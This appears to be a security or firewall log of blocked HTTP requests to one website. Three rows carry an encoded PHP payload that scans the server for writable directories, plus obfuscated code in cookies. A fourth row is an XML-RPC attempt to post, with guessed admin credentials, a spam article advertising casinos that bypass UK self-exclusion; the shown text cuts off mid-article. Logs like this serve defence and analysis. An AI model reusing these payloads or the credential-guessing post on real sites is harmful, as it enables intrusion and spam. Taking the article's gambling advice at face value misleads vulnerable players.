["2026-05-16 19:19:32","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> TF:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\ncontent-length:3339\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvIRLvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAlMJS0MJDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\n\nTF=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 19:20:03","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> YN:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\ncontent-length:3339\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Google Chrome\";v=\"101\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvJH4vKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyvLKAyK3Owo25hMJA0nJ9hVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\n\nYN=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 19:20:30","213.209.159.254","POST","\/","Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> oR:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nhost:dewenlabels.com\nsec-fetch-site:none\naccept:*\/*\naccept-encoding:gzip,deflate\nsec-fetch-dest:document\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvo1VvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzEvLI9coaAypaEco24vB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:3339\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-mode:navigate\n\noR=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 20:35:50","89.222.112.54","POST","\/xmlrpc.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36","post","select.+(from|limit) >> <?xml version:'1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their 